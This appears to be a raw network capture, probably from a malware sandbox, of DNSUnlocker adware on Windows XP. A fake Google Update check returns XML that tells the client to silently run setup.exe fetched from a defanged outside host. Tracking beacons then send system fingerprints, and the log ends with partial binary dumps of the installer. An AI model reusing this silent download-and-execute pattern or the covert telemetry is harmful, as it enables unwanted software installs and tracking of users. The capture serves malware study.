    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 412 Precondition Failed

    Date: Thu, 25 Feb 2016 17:42:22 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1454605844"

    Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT

    Cache-Control: max-age=21600

    Content-Length: 993

    Content-Type: text/xml; charset=UTF-8

    X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.sr,1456422142.dop003.se1.r,1456422142.cds006.se1.pr,1456422142.cds029.fr7.pr

    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping status="ok"/>. </app>.</response>.....

    <<< skipped >>>

    GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720 HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp

    X-Last-HR: 0x8004219c

    X-Last-HTTP-Status-Code: 412

    X-Retry-Count: 0

    Host: update.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:22 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1454605844"

    Last-Modified: Thu, 04 Feb 2016 17:10:44 GMT

    Cache-Control: max-age=21600

    Content-Length: 993

    Content-Type: text/xml; charset=UTF-8

    X-HW: 1456422142.dop001.fr7.t,1456422142.cds029.fr7.c

    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{84f03351-931d-41a5-a53d-6b5a7a5a2c96}" status="ok">. <updatecheck status="ok">. <urls>. <url codebase="hXXp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/"/>. </urls>. <manifest version="1.3.25.36">. <packages>. <package hash="Gf6XxEvl3JcorzFhctEtWsC2muE=" name="setup.exe" required="true" size="1141502"/>. </packages>. <actions>. <action arguments="/verysilent" event="update" run="setup.exe" />. <action version="1.3.25.36" event="postinstall" onsuccess="exitsilentlyonlaunchcmd"/>. </actions>. </manifest>. </updatecheck>. <ping status="ok"/>. </app>.</response>...

    GET /monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014 HTTP/1.1

    Host: logs.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:39 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1389114507"

    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

    Cache-Control: max-age=86400

    Content-Length: 35

    Content-Type: image/gif

    X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c

    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 2016 17:42:39 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1456422159.dop016.fr7.t,1456422159.cds050.fr7.c..GIF89a.............,...........D..;..

    GET /installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018 HTTP/1.1

    Host: stats.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=

    x-amz-request-id: 7A4D6F935DEEF740

    Date: Thu, 25 Feb 2016 17:42:16 GMT

    Expires: Mon, 26 Jul 1997 05:00:00 GMT

    Cache-Control: no-cache, must-revalidate

    Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT

    ETag: "28d6814f309ea289f847c69cf91194c6"

    Content-Type: image/gif

    Content-Length: 35

    Server: AmazonS3

    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: V0yDluovbLZtnr7Y6CIR Wdf7aIxX8ZHAIVIseurioi9mWcKXBUm8YZX2amA/yEyFw3WnHABxsA=..x-amz-request-id: 7A4D6F935DEEF740..Date: Thu, 25 Feb 2016 17:42:16 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

    GET /apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700 HTTP/1.1

    Accept: */*

    Host: stats.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=

    x-amz-request-id: F56AE9D950BAAAD1

    Date: Thu, 25 Feb 2016 17:42:30 GMT

    Expires: Mon, 26 Jul 1997 05:00:00 GMT

    Cache-Control: no-cache, must-revalidate

    Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT

    ETag: "28d6814f309ea289f847c69cf91194c6"

    Content-Type: image/gif

    Content-Length: 35

    Server: AmazonS3

    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: R2kGtHheD445mnN2QeE/oa2yCwQPig4tg lFCvpKQKKpNEGu/O4z6MoWArb3gr24gUxPs7BiJBg=..x-amz-request-id: F56AE9D950BAAAD1..Date: Thu, 25 Feb 2016 17:42:30 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

    GET /installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1

    Host: stats.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    x-amz-id-2: x3E G/Ql8kPOuBCrZ40b2DJUuNe1 KVwbRZXADv5q2NM6mMk UHrkOxzeTK8rxmmglzTyttzfUU=

    x-amz-request-id: 85C0F7272F6CE521

    Date: Thu, 25 Feb 2016 17:42:40 GMT

    Expires: Mon, 26 Jul 1997 05:00:00 GMT

    Cache-Control: no-cache, must-revalidate

    Last-Modified: Tue, 25 Feb 2014 00:06:34 GMT

    ETag: "28d6814f309ea289f847c69cf91194c6"

    Content-Type: image/gif

    Content-Length: 35

    Server: AmazonS3

    GIF89a.............,...........D..;....

    GET /apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042 HTTP/1.1

    Host: stats.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=

    x-amz-request-id: DCE50181449CA089

    Date: Thu, 25 Feb 2016 17:42:40 GMT

    Expires: Mon, 26 Jul 1997 05:00:00 GMT

    Cache-Control: no-cache, must-revalidate

    Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT

    ETag: "28d6814f309ea289f847c69cf91194c6"

    Content-Type: image/gif

    Content-Length: 35

    Server: AmazonS3

    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: I4M97BWeFobzd4oQMIcVVKifrL9B 5IbSZiu2uYS3lzBXvuIua9Ls1Niy0Ao3rSxjT31TxSvduc=..x-amz-request-id: DCE50181449CA089..Date: Thu, 25 Feb 2016 17:42:40 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:06:25 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=0-5444

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:33 GMT

    Via: 1.1 varnish

    Age: 1601

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 976

    X-Timer: S1456422153.287588,VS0,VE0

    Content-Range: bytes 0-5444/1153385

    Content-Length: 5445

    MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................@...............................................t...........=...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....=.......>...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i.

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=5445-13791

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:37 GMT

    Via: 1.1 varnish

    Age: 1605

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 983

    X-Timer: S1456422157.750239,VS0,VE0

    Content-Range: bytes 5445-13791/1153385

    Content-Length: 8347

    .E.P...Q..E.P...Q.;.}..E.....j...........j...S.~...j....u...j#...l...V.E..t;....u.Sj...,........E.V.E..E......k8..W.\0..a8...\8..E.f.M.PS.u..}..E.f.M... ...E.P..`q@...........=....t.h.. .j.S.&8..P..0........~.......B..h...3.3.;.t.S......U...;.t.j........9].t.j".......j......PSWV.. q@..?...j..E.!N~......j....x...j..E..n...Ph.....E.VP.u.W..$q@...;E..o...9].u j..M.....;.......j3.2...PV...p@.V.....p@...j"......M....QP.u......P.B.....;........Y...P......u....E.j..E......j..E.......M.SQ....B....SQSSSPW.E....... p@.....<.........@.u.j#.....W..6..@...u.j..f...V...@.X...u.h....WS.u......PW.u.S.u..u....p@...u..]..u......h.....G...j3...4...;..........M..E.....Q.M.VQSPW...p@.3.A..u4.}..t.9M.t..}..u#.E..E..E...0.q.63.9].V....E..L5...\...M..Uh.........j........;.........9].......M.t.QVPW...p@...SSS.M.SQVPW...p@...............W...p@......8.......V..4..P.....j..S....u..u.P.42...........P.....9].t.j.........@.3.@..j......P.A5..8...s....M.SQPh..@.V..4..P..(q@......j..]..........E...o........;.~..M.8.......V.]..J4..9]..E.~}.u..E.SP.E.j.P.u...,q@...te.}..u_9].u!.}..t .}..t%.E...>F:..E.t@;u.|..9..E.PW..3........E.8E.t.<.t.<.u...>F..j.Sj..u...4q@....u...>;......8........u.Sj......PV..3..P..4q@.9]........7...8.......V.{3..P..8q@..w...8.t...\...PW.^3..P..<q@...u?.E........M...j........\...QP..@q@....u......E......#...PW..2........PV.5...j..E.f....l.....V.u........u.j..V...V..0..j.h...@V.00......E........t.B..5.q@.Pj@.E.....;.t{S......u.W......u.j@....;..u.t4.u.VS.u..W........F....Q..VP.M.../...u.8.u..u....p@..E.SP

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=13792-25330

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:40 GMT

    Via: 1.1 varnish

    Age: 1608

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 990

    X-Timer: S1456422160.842481,VS0,VE0

    Content-Range: bytes 13792-25330/1153385

    Content-Length: 11539

    ....u......V.u..u......^]...U....H...B.SV.E..p<.@8.......B..}.....W.E......u.VS.}...V.4....}.....ur.}.SW..,r@.V.E........t.V.2.....u.V.....V.=8.B..u....q@..E..p4j.W.5....E..p0j.W.'....u..T...j..........n...j..u....}.............E.;.u..M....f......A....E.....=..........j.3.Y.}..u....E....B.h..B..E..}..E.1E@..u.......E..E.P.E.A.....Tq@...tVP..xr@.V......p.B.........t(...DC.u Pj......W...B.W...p@...t.WV.........B.VS.u..#......E......}.....t..}.......u....e...e..VS.....V.$.....u..E........B.VW.9...3.S.S...;..E.t53.;.t-.E.P.E.P.E.PW.U...ul..t.f!.W.=.....K;.f..\.u.3.VW.....W.o...;.t.. ..E.P.E.P.E.P.E.PW...p@...t:.E........E.V.u.P..0q@....E...... .}..E.........E.....3....}......j......9].t.;.s..E.......<.B.9Y.t Pj.h.........9].t.Wj.V.......h..B.V.u.......E.;....B.u.j..#....E..E..p.t..].3.9]....P.....9].u.9...B.u..{.......B..u..u..u......_^[....U...}..V.5Dr@.u..u.h.....c....u.j.hf....u....}..u-.u..u...Pq@...t.j........u.@..3.Pj.he....u...3.^]...U....@SV.u.Wj......._j.[s.j._j.[......s.j.3.[..33..s.3...@j...Y......E.j.P.H...P.E.SP.=...P..%......j.3........Y......RVh..@....B..u.V.....V.........W...r@....V.u..58.B..f..._^[........B.....B.3...t.V.A..t..t$..........Ju.^...U....8V.5Dr@.W.}.j.j.h....W...}..t<...q@...........E..E.PW.M...pq@..E.Pj.h....W...E.fu.......E..E..E.Pj.h....W.E........E._^....U....PSV.5,r@.Wh.....u...h.....E..u.......B..5Dr@..E..p.B......3..}......]..E..."....E.j....B....B.[.}....Pj@.]....q@.jn...B..5`.B....q@.....B..h.L@.j..E..u...0r@.Wj.j!j.j....B...4p@.h.......B..u.P..(p@..5..B.Sh.....u...WW

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=25331-36869

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:42 GMT

    Via: 1.1 varnish

    Age: 1610

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 996

    X-Timer: S1456422162.138030,VS0,VE0

    Content-Range: bytes 25331-36869/1153385

    Content-Length: 11539

    .Zy..>y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x..*x...x...x...w...z...................................}...}...}...~...~..,~..<~..N~..^~..l~..~~...~...~...~...~...~...~...~...~.......}..4...F...T...f...z.......................R}..<}..0}...}...}...|...|...|...|...}...}...}..~}..r}..$...b}...|...|...|..||..t|..d|..R|..B|..0|.."|...|...|...{...{...|......v...`...N.......4...$...............RichEdit....RichEdit20A.RichEd32....RichEd20.....DEFAULT\Control Panel\International....Control Panel\Desktop\ResourceLocale....[Rename]....%d..Software\Microsoft\Windows\CurrentVersion...\Microsoft\Internet Explorer\Quick Launch.......................................................#. .3.;.C.S.c.s...........................................................................p.p.......................!.1.A.a.......................... .0.@.`...........................................................................F...............F...............F.u...........{..`p...v..............lq...u..........v...<p...v..............Pq..du...............p...u..............(p...w..........D...xr...w..............hr......................,...@...................r...d...R...........................h...X...H...2........................y...y...y...y...y...y...y...z.. z..4z..Jz..Rz..bz..pz...z...z...z...z...y...z...z...z...{...{...{..>{..L{..\{..n{...{...{...{...{...{...{..ry..fy..Zy..>y..0y.."y...y...x...x...x...x...x...x..|x..`x..Tx..Hx...w..6x..*x...x...x...w...z...................................}...}...}...~...

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=36870-60156

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:43 GMT

    Via: 1.1 varnish

    Age: 1611

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 999

    X-Timer: S1456422163.281776,VS0,VE0

    Content-Range: bytes 36870-60156/1153385

    Content-Length: 23287

    ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................_.............................................V.............................................QS`.............%..............................RST..........S;..............S.................QOTh.........P;??..............U...............QOK`.........P;?@@?..............S..............#J^`........P;?@@@@?..............U............"IK`h........DdEBA@@@@=............SU..........$.JLh........cgg..jEA>..<...........SO...........HK^h...............eE...............OU........%.FJ^h................j...............SI..........FJ]b................e...............SOU......%..'M]b................e..............._OI......$.(*MXob...............................VP ........(3W\a..........hpppiffT..............VPIU......)25[n.................................ZPI ......07km..................................ZPI ......678...................................ZP......./6~..................................aZXJ........6~8...........................a.ZaZaZXKJ........679m.............................Z_ZT_PI....

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=60157-106798

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:44 GMT

    Via: 1.1 varnish

    Age: 1612

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 1000

    X-Timer: S1456422164.355846,VS0,VE0

    Content-Range: bytes 60157-106798/1153385

    Content-Length: 46642

    .A/...\..Ys..kH]...?]v..R.r..7.....kS..nH......*R...E...<81M.c.m...uC....y............~...........{..u...~.o..=...{.E........vj.[.w.u?..<....n2...L..y.JO;h...dN2....L...|k0ZN<4......).d....)....\l..<..y._....x.,....7m.......~..1.4i....='.b..p.Y..?.{.J/~.~.'...*.yRM....-..{..t.5.......&..../..6.....M...R..;_..e..~Bcl.}.14.....e...92z.)....~... 0....?...|..U.7..|.[..TY6\..f.........I...O}...j.b...?u.{Ak.yJ..w...)oJk.eJ..7..*.u..[..X..c....5..m5.T...j..t.(.f.....VYM....Q.E1=.|W.>F.S..{jJ.s..y.-..K..CN.So..V.....Y..B.:..u;.mx..G.)....E/............Z.....-.Y.(.....5.......,K.....?.s.....uP.....$;._!...YM.*.{...........E..........J....g...m.A....}.,...jq.L...i29E&/..Sd.K&.....l.....v..5..'....k.vxi....C...7c...c.L..0O......{c..&,tS...36..>.........g.oN>I.E.X.S.5...U.a....Tg.Y...fd.T.........w.s*0.....j..h..:..(J.i...W.o..{..In....=)..FY......45N1.....C.........6......1....Y&.jr>M....a...b..;.M...g.p..........o.1.w'....N...1P.TK\.]J...Y".(.U$...[....N.W..9..1.N.x.... >.n..G.\.9]L...{E.....~. j.h.$......juu...7....... .'.s47...>Y<....F.Xc..i>....F.T[.._....2...d..5..BK&M..&..*qz.6GVcg...b.d7XM_8...;^)..!......m.>....z8....NT.~yj7...3...v....x...G.j...E.V...oN.1.....6.....q.2...#.....<..-6....}.}..=@}.@....9i4E.....1m.qe..[....l..d~........N..'j.S.is....r...M..xS.=.kd../w.s..#....kY...F.w...._t.4..&[..(%@U...-.J.l..a....j.......&...Mf.D.ib...=_.>w...........y.....bEm...A9..l...'.a4..[.S...1}o..I.{X.....n.q&.bG.......M.b.S..."....^..`;!.].z.=f.y.#b..{....h[<5.....0P9R....?m

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=106799-199361

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:45 GMT

    Via: 1.1 varnish

    Age: 1613

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 1004

    X-Timer: S1456422165.419858,VS0,VE0

    Content-Range: bytes 106799-199361/1153385

    Content-Length: 92563

    P...2....h..`Juy......Z.z...\o...t.G.W.........S.9..{..oH3.E........~.[q..b...3(..^PteU.....`d....8.......>.W..._.;..|. &R..!..3.....x.\.^h.%...........(.w....z......du-)...$=9f..Av!...T...P.\2Yl..Ez u..A..f..N......oxq,A.b0*...M..#.......n_>..F..t..8..l........:J.r...=U2XH7.B.ns..[.i........C..FH.Q.........E1q.?..f.@.3.......rk..?....Yi.Ux.3...J.@ .. ._%'.V...t..7.".e.]9.J....%h.8.gJ\..hQ......@.n...CH..........R.w._...._..._B.X....<........[..A..-.%.....l..bv.....k......x..!...w.....W&m.....G|"3....[.~7...e.-.b<...Ao.mS..p..6.dQ).....o...}i.t\.U...(..}.........x.jv9.8.c8.O?!Y]N.c.......aZ..... .....0..Lb:k.x..v}<.~.z.d.......H...C.yU9..S............y....=.....U.*.....i.....i&..S...{..s...j..Q..!.....@.,)...P.@ ....%_.k....&{..d.W....d..&i.7......}.k...2........^.]..{.,O.sN.#D......=...T.)......'...$..o.%W..Zr...kQ......G.L...o:0 ......?..M.h.c=......h...7?`|..F...7.............{u/z.gYI.z.sy6..b......*.$..Mr8.CO>.'K..H.d.D.\.TR.u"=....'Aq.A.8.5......G@q|.]..@...P.A.9.P..Z..k.B..v..,.@...)......S-.......T...g3.n....w*.`.V..<N.7kO_.)...N.L...)l1..neAU...s .w....$Z.=.m_....../..).&.....9>....p.l.Cn....d:.7.."..A.s..$.. ..p..^...s.A..._1..../..k.~.U..tT.y`Ev5E./.V..>...M..D..!..d.@..F......M..[..&....}..IO..~_O....a...../....(.0....PX.A.x..{.<..h.......a......=S..Bbv.<..L.%-Kn.XL.2.7.K.?...<.........3@..Q"..M.HP...@..r.pIP.`E:..".HP..I..a.*VTZo.z.-m..EL.$......X..1X......[k.s..%(.........\.Y{....{.u.Nt...........0}...\]1.....c...xf.....l..i...B.- .....Y....C...h.R..z..&..l.u..{.

    <<< skipped >>>

    GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1

    Accept: */*

    Accept-Encoding: identity

    Range: bytes=199362-382774

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    User-Agent: Microsoft BITS/6.7

    Host: cdn.roastfiles2017.com

    Connection: Keep-Alive

    HTTP/1.1 206 Partial Content

    Server: nginx/1.7.2

    Content-Type: application/octet-stream

    Content-Description: File Transfer

    Content-Disposition: attachment; filename=setup.exe

    Content-Transfer-Encoding: binary

    Expires: 0

    Cache-Control: public, max-age=0

    Pragma: no-cache

    Accept-Ranges: bytes

    Date: Thu, 25 Feb 2016 17:42:46 GMT

    Via: 1.1 varnish

    Age: 1614

    Connection: keep-alive

    X-Served-By: cache-fra1238-FRA

    X-Cache: HIT

    X-Cache-Hits: 1007

    X-Timer: S1456422166.481635,VS0,VE0

    Content-Range: bytes 199362-382774/1153385

    Content-Length: 183413

